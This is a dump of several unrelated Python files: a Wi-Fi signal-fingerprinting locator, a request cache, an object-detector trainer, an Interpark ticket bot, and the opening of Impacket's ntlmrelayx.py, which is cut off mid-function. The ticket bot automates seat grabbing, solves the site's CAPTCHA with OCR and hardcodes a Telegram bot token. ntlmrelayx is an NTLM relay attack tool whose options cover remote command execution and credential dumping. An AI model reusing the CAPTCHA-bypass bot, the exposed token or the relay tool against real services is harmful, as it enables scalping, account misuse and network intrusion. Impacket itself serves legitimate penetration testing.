for z in fingerprint[mac]:
for x in range(len(fingerprint[mac][z])):
for y in range(len(fingerprint[mac][z][x])):
if fingerprint[mac][z][x][y] != None:
c = abs(fingerprint[mac][z][x][y] - compare_avg[mac])
num_macs[z][x][y] = num_macs[z][x][y] + 1
if difference[z][x][y] != None:
difference[z][x][y] += c
else:
difference[z][x][y] = c
final_z = ''
final_x = 0
final_y = 0
print difference
for z in difference:
for x in range(len(difference[z])):
for y in range(len(difference[z][x])):
if(final_z == ''):
final_z = z
if(difference[final_z][final_x][final_y] is None and difference[z][x][y] is not None):
final_z = z
final_x = x
final_y = y
if(difference[z][x][y] != None and difference[final_z][final_x][final_y]/num_macs[final_z][final_x][final_y] > difference[z][x][y]/num_macs[z][x][y]):
final_z = z
final_x = x
final_y = y
print(final_z, final_x, final_y)
im = Image.open(self.path + "/"+ final_z +".gif").copy()
draw = ImageDraw.Draw(im)
draw.line((box_size*x, 0, box_size*x, 240), fill=128, width=1)
draw.rectangle([final_x*box_size, final_y*box_size, final_x*box_size+box_size, final_y*box_size+box_size], fill=100)
draw.text([5,5], str(wifi_count))
draw.text([5,15], str(bl_count))
self.image = ImageTk.PhotoImage(im)
imagelabel.configure(image = self.image)
self.parent.update()
self.after(50, self.realtime_calculation, imagelabel)
def back_btn(self):
num = 0
# create a new frame
wrap = Frame(self, bg="black")
# when there were previous frames, hide the top one and add a back button for the new one
if len(self.framestack):
self.hide_top()
back = FlatButton(
wrap,
text='Back…',
image=self.get_icon("arrow.left"),
command= self.go_back,
)
def destroy_top(self):
"""
destroy the top page
:return:
"""
self.framestack[len(self.framestack) - 1].destroy()
self.framestack.pop()
def destroy_all(self):
"""
destroy all pages except the first aka. go back to start
:return:
"""
while len(self.framestack) > 1:
self.destroy_top()
def go_back(self):
"""
destroy the current frame and reshow the one below
:return:
"""
global realt
realt = False
print "go_back:", realt
self.destroy_top()
self.show_top()
def app_exit(self):
# Kills application
self.quit()
def main():
global fingerprint, iface
root = Tk()
root.geometry("240x320")
root.wm_title('Marauders Map')
if len(sys.argv) > 1 and sys.argv[1] == 'fs':
root.wm_attributes('-fullscreen', True)
app = Marauders(root)
channel_hop.start_mon_mode('wlan0')
# Start channel hopping
iface = channel_hop.get_mon_iface()
#iface = 'wlan2'
hop = threading.Thread(target=channel_hop.channel_hop, args=[iface])
hop.daemon = True
hop.start()
os.system("sudo hciconfig hci0 reset")
#p = Popen(["hciconfig", "hci0", "down"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
#p = Popen(["hciconfig", "hci0","up"], stdout=PIPE, stderr=PIPE, preexec_fn=os.setsid)
#p = Popen([app.path+"/ibeacon_scan","-b"], stdout=PIPE, preexec_fn=os.setsid)
if(os.path.isfile(app.path + '/fingerprint.pkl')):
fingerprint_file = open(app.path + '/fingerprint.pkl', 'rb')
fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
root.mainloop()
if __name__ == '__main__':
main()
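# Data layout note (derived from record() above): the pickled fingerprint
# maps MAC address -> map name (z) -> grid x -> grid y -> mean RSSI in dBm,
# e.g. fingerprint["aa:bb:cc:dd:ee:ff"]["kirk-auditorium2"][3][5] == -62.5
# (hypothetical values). realtime_calculation() then locates the grid cell
# whose fingerprint has the smallest mean absolute difference from the
# live readings.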
|
buffer.py
|
from databuffer.data import buffered_urls, timeout
from threading import Thread
import time
import requests
def cleaningTask():
# Periodically drop cached responses older than `timeout`. Iterate over
# a copy so entries can be removed safely while scanning.
while True:
for item in list(buffered_urls):
if (time.time() - item["time"]) > timeout:
buffered_urls.remove(item)
time.sleep(timeout / 2)
def inquire(url, params={}, headers={}):
in_params = params
in_headers = headers
for item in buffered_urls:
if item["url"] == url:
item["request_times"][0] = item["request_times"][1]
item["request_times"][1] = time.clock()
return item["response"]
data = requests.get(url, params=in_params, headers=in_headers)
buffered_urls.append({"url": url, "time": time.time(), "request_times": [time.perf_counter() - 1, time.perf_counter()], "params": in_params, "headers": in_headers, "response": data})
return data
# Note: the importing module is expected to start this thread (see the
# usage sketch below).
cleaning_thread = Thread(target=cleaningTask, daemon=True)
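# Illustrative usage sketch (an assumption, not part of the original
# source); the URL and params are hypothetical.
#
# cleaning_thread.start()
# response = inquire("https://example.com/api", params={"q": "test"})
# print(response.status_code)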
|
train_detector.py
|
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
def prefetch_data(system_config, db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(system_config, db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def _pin_memory(ts):
if type(ts) is list:
return [t.pin_memory() for t in ts]
return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [_pin_memory(x) for x in data["xs"]]
data["ys"] = [_pin_memory(y) for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
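# Note (derived from the code above and Train() below): the semaphore is
# acquired once up front, so acquire(blocking=False) fails while training
# runs; when the main loop calls release(), the next pass through this
# loop succeeds in acquiring it and the pinning thread exits.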
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def terminate_tasks(tasks):
for task in tasks:
task.terminate()
class Detector():
def __init__(self, verbose=1):
self.system_dict = {};
self.system_dict["verbose"] = verbose;
self.system_dict["local"] = {};
self.system_dict["dataset"] = {};
self.system_dict["dataset"]["train"] = {};
self.system_dict["dataset"]["val"] = {};
self.system_dict["dataset"]["val"]["status"] = False;
self.system_dict["dataset"]["params"] = {};
self.system_dict["dataset"]["params"]["workers"] = 4;
self.system_dict["model"] = {};
self.system_dict["model"]["params"] = {};
self.system_dict["model"]["params"]["cfg_file"] = "CornerNet_Saccade";
self.system_dict["model"]["params"]["initialize"] = False;
self.system_dict["model"]["params"]["distributed"] = False;
self.system_dict["model"]["params"]["world_size"] = 0;
self.system_dict["model"]["params"]["rank"] = 0;
self.system_dict["model"]["params"]["dist_url"] = None;
self.system_dict["model"]["params"]["dist_backend"] = "nccl";
self.system_dict["model"]["params"]["use_gpu"] = True;
self.system_dict["training"] = {};
self.system_dict["training"]["params"] = {};
self.system_dict["training"]["params"]["start_iter"] = 0;
self.system_dict["training"]["params"]["gpu"] = None;
def Train_Dataset(self, root_dir, coco_dir, img_dir, set_dir, batch_size=4, use_gpu=True, num_workers=4):
self.system_dict["dataset"]["train"]["root_dir"] = root_dir;
self.system_dict["dataset"]["train"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["train"]["img_dir"] = img_dir;
self.system_dict["dataset"]["train"]["set_dir"] = set_dir;
self.system_dict["dataset"]["params"]["batch_size"] = batch_size;
self.system_dict["dataset"]["params"]["workers"] = num_workers;
self.system_dict["model"]["params"]["use_gpu"] = use_gpu;
def Val_Dataset(self, root_dir, coco_dir, img_dir, set_dir):
self.system_dict["dataset"]["val"]["status"] = True;
self.system_dict["dataset"]["val"]["root_dir"] = root_dir;
self.system_dict["dataset"]["val"]["coco_dir"] = coco_dir;
self.system_dict["dataset"]["val"]["img_dir"] = img_dir;
self.system_dict["dataset"]["val"]["set_dir"] = set_dir;
def Model(self, model_name="CornerNet_Saccade", use_distributed=False):
self.system_dict["model"]["params"]["cfg_file"] = model_name;
self.system_dict["model"]["params"]["distributed"] = use_distributed;
if(self.system_dict["model"]["params"]["distributed"]):
print("Distributed training not enabled yet");
def Hyper_Params(self, lr=0.00025, total_iterations=1000, val_interval=500):
self.system_dict["training"]["params"]["lr"] = lr;
self.system_dict["training"]["params"]["total_iterations"] = total_iterations;
self.system_dict["training"]["params"]["val_interval"] = val_interval;
def Setup(self):
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
ngpus_per_node = torch.cuda.device_count()
current_dir = os.path.dirname(os.path.realpath(__file__));
cfg_file = os.path.join(current_dir, "configs", self.system_dict["model"]["params"]["cfg_file"] + ".json")
with open(cfg_file, "r") as f:
self.system_dict["local"]["config"] = json.load(f)
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["train"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["train"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["train"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["train"]["set_dir"];
f = open(self.system_dict["dataset"]["train"]["root_dir"] + "/" + self.system_dict["dataset"]["train"]["coco_dir"] + "/annotations/classes.txt");
lines = f.readlines();
f.close();
self.system_dict["local"]["config"]["db"]["categories"] = len(lines);
self.system_dict["local"]["config"]["system"]["batch_size"] = self.system_dict["dataset"]["params"]["batch_size"];
self.system_dict["local"]["config"]["system"]["chunk_sizes"] = [self.system_dict["dataset"]["params"]["batch_size"]];
self.system_dict["local"]["config"]["system"]["max_iter"] = self.system_dict["training"]["params"]["total_iterations"];
self.system_dict["local"]["config"]["system"]["snapshot_name"] = self.system_dict["model"]["params"]["cfg_file"]
self.system_dict["local"]["system_config"] = SystemConfig().update_config(self.system_dict["local"]["config"]["system"])
self.system_dict["local"]["training_dbs"] = [datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"]) for _ in range(self.system_dict["dataset"]["params"]["workers"])]
if(self.system_dict["dataset"]["val"]["status"]):
self.system_dict["local"]["config"]["db"]["root_dir"] = self.system_dict["dataset"]["val"]["root_dir"];
self.system_dict["local"]["config"]["db"]["coco_dir"] = self.system_dict["dataset"]["val"]["coco_dir"];
self.system_dict["local"]["config"]["db"]["img_dir"] = self.system_dict["dataset"]["val"]["img_dir"];
self.system_dict["local"]["config"]["db"]["set_dir"] = self.system_dict["dataset"]["val"]["set_dir"];
self.system_dict["local"]["validation_db"] = datasets[self.system_dict["local"]["system_config"].dataset](self.system_dict["local"]["config"]["db"],
sys_config=self.system_dict["local"]["system_config"])
if(not os.path.isdir("cache/")):
os.mkdir("cache");
if(not os.path.isdir("cache/nnet")):
os.mkdir("cache/nnet/");
if(not os.path.isdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"])):
os.mkdir("cache/nnet/" + self.system_dict["model"]["params"]["cfg_file"]);
model_file = "core.models.{}".format(self.system_dict["model"]["params"]["cfg_file"])
print("Loading Model - {}".format(model_file))
model_file = importlib.import_module(model_file)
self.system_dict["local"]["model"] = model_file.model(self.system_dict["local"]["config"]["db"]["categories"])
print("Model Loaded");
def Train(self, display_interval=100):
# reading configuration from the system dictionary
start_iter = self.system_dict["training"]["params"]["start_iter"]
distributed = self.system_dict["model"]["params"]["distributed"]
world_size = self.system_dict["model"]["params"]["world_size"]
initialize = self.system_dict["model"]["params"]["initialize"]
gpu = None
rank = self.system_dict["model"]["params"]["rank"]
# reading training and dataset hyperparameters
batch_size = self.system_dict["dataset"]["params"]["batch_size"]
learning_rate = self.system_dict["training"]["params"]["lr"]
max_iteration = self.system_dict["training"]["params"]["total_iterations"]
pretrained_model = None;
stepsize = int(self.system_dict["training"]["params"]["total_iterations"]*0.8)
snapshot = int(self.system_dict["training"]["params"]["total_iterations"]*0.5)
val_iter = self.system_dict["training"]["params"]["val_interval"]
display = display_interval
decay_rate = self.system_dict["local"]["system_config"].decay_rate
print("start_iter = {}".format(start_iter));
print("distributed = {}".format(distributed));
print("world_size = {}".format(world_size));
print("initialize = {}".format(initialize));
print("batch_size = {}".format(batch_size));
print("learning_rate = {}".format(learning_rate));
print("max_iteration = {}".format(max_iteration));
print("stepsize = {}".format(stepsize));
print("snapshot = {}".format(snapshot));
print("val_iter = {}".format(val_iter));
print("display = {}".format(display));
print("decay_rate = {}".format(decay_rate));
print("Process {}: building model...".format(rank))
self.system_dict["local"]["nnet"] = NetworkFactory(self.system_dict["local"]["system_config"],
self.system_dict["local"]["model"], distributed=distributed, gpu=gpu)
# queues storing data for training
training_queue = Queue(self.system_dict["local"]["system_config"].prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(self.system_dict["local"]["system_config"].prefetch_size)
pinned_validation_queue = queue.Queue(5)
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
self.system_dict["local"]["training_dbs"],
training_queue, data_sampling_func, True)
if self.system_dict["dataset"]["val"]["status"]:
validation_tasks = init_parallel_jobs(self.system_dict["local"]["system_config"],
[self.system_dict["local"]["validation_db"]],
validation_queue, data_sampling_func, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("Process {}: loading from pretrained model".format(rank))
self.system_dict["local"]["nnet"].load_pretrained_params(pretrained_model)
if start_iter:
self.system_dict["local"]["nnet"].load_params(start_iter)
learning_rate /= (decay_rate ** (start_iter // stepsize))
self.system_dict["local"]["nnet"].set_lr(learning_rate)
print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
else:
self.system_dict["local"]["nnet"].set_lr(learning_rate)
if rank == 0:
print("training start...")
self.system_dict["local"]["nnet"].cuda()
self.system_dict["local"]["nnet"].train_mode()
if(self.system_dict["dataset"]["val"]["status"]):
old_val_loss = 100000.0;
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if val_iter and self.system_dict["local"]["validation_db"].db_inds.size and iteration % val_iter == 0:
self.system_dict["local"]["nnet"].eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = self.system_dict["local"]["nnet"].validate(**validation)
print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
if(validation_loss < old_val_loss):
print("Loss Reduced from {} to {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].save_params("best");
old_val_loss = validation_loss;
else:
print("validation loss did not go below {}, current loss - {}".format(old_val_loss, validation_loss))
self.system_dict["local"]["nnet"].train_mode()
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
terminate_tasks(validation_tasks)
else:
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = self.system_dict["local"]["nnet"].train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
del training_loss
if iteration % val_iter == 0:
self.system_dict["local"]["nnet"].save_params("intermediate")
if iteration % stepsize == 0:
learning_rate /= decay_rate
self.system_dict["local"]["nnet"].set_lr(learning_rate)
self.system_dict["local"]["nnet"].save_params("final");
# sending signal to kill the thread
training_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
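# The pin_memory worker targeted by the threads above is defined elsewhere in
# this project. A minimal sketch of what it presumably does, assuming each
# queue item is a dict of CPU tensors under "xs"/"ys" keys (an assumption,
# not this repo's exact code): move fetched tensors into page-locked memory
# for faster host-to-GPU transfer, and exit once the main thread releases
# the kill semaphore.
def pin_memory_sketch(data_queue, pinned_data_queue, sema):
    while True:
        data = data_queue.get()
        data["xs"] = [x.pin_memory() for x in data["xs"]]
        data["ys"] = [y.pin_memory() for y in data["ys"]]
        pinned_data_queue.put(data)
        if sema.acquire(blocking=False):
            return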
|
Interpark + telegram.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
from tkinter import *
from datetime import datetime
import numpy, re, pyotp, sys, time, tkinter.ttk, pytesseract, tkinter.font
import cv2 as cv
from pytesseract import image_to_string
from telegram import InlineKeyboardButton, InlineKeyboardMarkup, ChatAction, Update, Bot
from telegram.ext import CommandHandler, MessageHandler, CallbackQueryHandler, Updater, Filters
import threading
dp = Tk()
main_frame = Frame(dp)
dp.geometry('500x500')
dp.title("인터파크 티켓팅 프로그램")
main_frame.pack()
driver = webdriver.Chrome("es/chromedriver")
wait = WebDriverWait(driver, 20)
url = "https://ticket.interpark.com/Gate/TPLogin.asp"
driver.get(url)
id_label = Label(main_frame, text = "아이디")
id_label.grid(row = 1, column = 0)
id_entry = Entry(main_frame)
id_entry.grid(row = 1, column = 1)
pw_label = Label(main_frame, text = "비밀번호")
pw_label.grid(row = 2, column = 0)
pw_entry = Entry(main_frame, show = '*')
pw_entry.grid(row = 2, column =1)
showcode_label = Label(main_frame, text = "공연번호")
showcode_label.grid(row=4, column = 0)
showcode_entry = Entry(main_frame)
showcode_entry.grid(row=4, column = 1)
date_label = Label(main_frame, text = "날짜")
date_label.grid(row=5, column = 0)
date_entry = Entry(main_frame)
date_entry.grid(row=5, column = 1)
round_label = Label(main_frame, text = "회차")
round_label.grid(row = 6, column = 0)
round_entry = Entry(main_frame)
round_entry.grid(row=6, column = 1)
ticket_label = Label(main_frame, text = "티켓 수")
ticket_label.grid(row = 7, column = 0)
ticket_entry = Entry(main_frame)
ticket_entry.grid(row=7, column = 1)
code_time = Entry(main_frame)
code_time.grid(row=12, column = 1)
def login_go():
driver.switch_to.frame(driver.find_element_by_tag_name('iframe'))
driver.find_element_by_name('userId').send_keys(id_entry.get())
driver.find_element_by_id('userPwd').send_keys(pw_entry.get())
driver.find_element_by_id('btn_login').click()
def link_go():
driver.get('http://poticket.interpark.com/Book/BookSession.asp?GroupCode=' + showcode_entry.get())
def seat_macro():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_name("ifrmSeat")
driver.switch_to.frame(seat1_frame)
seat2_frame = driver.find_element_by_name("ifrmSeatDetail")
driver.switch_to.frame(seat2_frame)
wait.until(EC.element_to_be_clickable((By.CLASS_NAME, 'stySeat')))
len_seatn = len(driver.find_elements_by_class_name('stySeat'))
print(len_seatn)
len_VIP = len(driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/1_90.gif"]'))
print(len_VIP)
shot = 0
VIP = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/1_90.gif"]')
R = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/2_90.gif"]')
S = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/3_90.gif"]')
A = driver.find_elements_by_css_selector('img[src="http://ticketimage.interpark.com/TMGSNAS/TMGS/G/4_90.gif"]')
for x in range(0 , len_seatn):
try:
VIP[x].click()
shot = shot + 1
except:
try:
R[x].click()
shot = shot + 1
except:
try:
S[x].click()
shot = shot + 1
except:
try:
A[x].click()
shot = shot + 1
except:
break
if shot == int(ticket_entry.get()):
break
def captcha():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_id("ifrmSeat")
driver.switch_to.frame(seat1_frame)
image = driver.find_element_by_id('imgCaptcha')
image = image.screenshot_as_png
with open("captcha.png", "wb") as file:
file.write(image)
image = cv.imread("captcha.png")
#Set a threshold value for the image, and save
image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
image = cv.adaptiveThreshold(image, 255, cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY, 71, 1)
kernel = cv.getStructuringElement(cv.MORPH_RECT, (3, 3))
image = cv.morphologyEx(image, cv.MORPH_OPEN, kernel, iterations=1)
cnts = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if len(cnts) == 2 else cnts[1]
for c in cnts:
area = cv.contourArea(c)
if area < 50:
cv.drawContours(image, [c], -1, (0,0,0), -1)
kernel2 = numpy.array([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
image = cv.filter2D(image,-1,kernel2)
result = 255 - image
captcha_text = image_to_string(result)
print(captcha_text)
driver.switch_to.default_content()
driver.switch_to.frame(seat1_frame)
driver.find_element_by_class_name('validationTxt').click()
driver.find_element_by_id('txtCaptcha').send_keys(captcha_text)
while 1:
if driver.find_element_by_class_name('capchaInner').is_displayed():
driver.find_element_by_class_name('refreshBtn').click()
captcha()
else:
break
def date_select():
first_frame = driver.find_element_by_id('ifrmBookStep')
driver.switch_to.frame(first_frame)
# date
driver.find_element_by_xpath('(//*[@id="CellPlayDate"])' + "[" + date_entry.get() + "]").click()
# session
wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/div/div[3]/div[1]/div/span/ul/li[' + round_entry.get() + ']/a'))).click()
driver.switch_to.default_content()
wait.until(EC.element_to_be_clickable((By.ID, 'LargeNextBtnImage'))).click()
# next
try:
driver.switch_to.alert.accept()
driver.switch_to.default_content()
wait.until(EC.presence_of_all_elements_located((By.ID, 'ifrmSeat')))
except:
driver.switch_to.default_content()
wait.until(EC.presence_of_all_elements_located((By.ID, 'ifrmSeat')))
def go2():
driver.switch_to.default_content()
seat1_frame = driver.find_element_by_id("ifrmSeat")
driver.switch_to.frame(seat1_frame)
seat2_frame = driver.find_element_by_id("ifrmSeatDetail")
driver.switch_to.frame(seat2_frame)
seat_macro()
try:
driver.switch_to.alert.accept()
driver.switch_to.default_content()
driver.switch_to.frame(seat1_frame)
driver.find_element_by_id('NextStepImage').click()
driver.switch_to.alert.accept()
except:
driver.switch_to.default_content()
driver.switch_to.frame(seat1_frame)
driver.find_element_by_id('NextStepImage').click()
def go():
code_time.delete(0, END)
start_time = time.time()
try:
driver.find_element_by_class_name('closeBtn').click()
date_select()
try:
captcha()
go2()
pass
except:
go2()
pass
except:
date_select()
try:
captcha()
go2()
pass
except:
go2()
pass
finally:
code_time.insert(0 ,"%s 초" % round((time.time() - start_time),3) )
def clock_time():
clock = datetime.now().strftime('%H:%M:%S:%f')
time_label.config(text = clock)
time_label.after(1, clock_time)
BOT_TOKEN = '1289747693:AAEBosjOS2ui3ROkGrPOwmDq04JRrLPOL_U'
updater = Updater(token=BOT_TOKEN, use_context=True)
def build_menu(buttons, n_cols, header_buttons=None, footer_buttons=None):
menu = [buttons[i:i + n_cols] for i in range(0, len(buttons), n_cols)]
if header_buttons:
menu.insert(0, header_buttons)
if footer_buttons:
menu.append(footer_buttons)
return menu
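# Example: build_menu([b1, b2, b3], n_cols=2) returns [[b1, b2], [b3]];
# header_buttons/footer_buttons, when given, are inserted as whole rows.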
def get_command(update, context):
    show_list = []
    show_list.append(InlineKeyboardButton("시작", callback_data='1'))
    show_list.append(InlineKeyboardButton("직링", callback_data='2'))
    show_markup = InlineKeyboardMarkup(build_menu(show_list, len(show_list) - 1))
    update.message.reply_text("선택하세요.", reply_markup=show_markup)
def button_callback(update, context):
    # inline button presses arrive as a CallbackQuery, not on the original message
    query = update.callback_query
    query.answer()
    if query.data == '1':
        go()
    elif query.data == '2':
        link_go()
get_handler = CommandHandler('task', get_command)
updater.dispatcher.add_handler(get_handler)
updater.dispatcher.add_handler(CallbackQueryHandler(button_callback))
login_button = Button(main_frame, text = "로그인", command = login_go, height = 2)
login_button.grid(row=2, column = 3)
link_button = Button(main_frame, text = "직링", command = link_go, height = 2)
link_button.grid(row=3, column = 1)
start_button = Button(main_frame, text = "시작", command = go, height = 2)
start_button.grid(row=8, column = 1)
chair_button = Button(main_frame, text = "좌석", command = go2, height = 2)
chair_button.grid(row=9, column = 1)
captcha_button = Button(main_frame, text = '캡챠', command = captcha, height = 2)
captcha_button.grid(row=10, column = 1)
time_label = Label(main_frame, height = 2)
time_label.grid(row=11, column = 1)
clock_time()
def updater2():
    updater.start_polling()
def mainup():
    # poll Telegram in a background thread; updater.idle() is not used here
    # because it installs signal handlers, which only works in the main thread
    threading.Thread(target=updater2, daemon=True).start()
    # tkinter's mainloop must run on the main thread
    dp.mainloop()
mainup()
|
ntlmrelayx.py
|
#!/usr/bin/env python
# Impacket - Collection of Python classes for working with network protocols.
#
# SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# Generic NTLM Relay Module
#
# This module performs the SMB Relay attacks originally discovered
# by cDc, extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking an SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce SPN checks and/or signing on the server.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want, so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer, WCFRelayServer, RAWRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_finished_attacks(self, line):
for url in self.relayConfig.target.finishedAttacks:
print (url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setDisableMulti(options.disable_multi)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setSMBChallenge(options.ntlmchallenge)
c.setInterfaceIp(options.interface_ip)
c.setExploitOptions(options.remove_mic, options.remove_target)
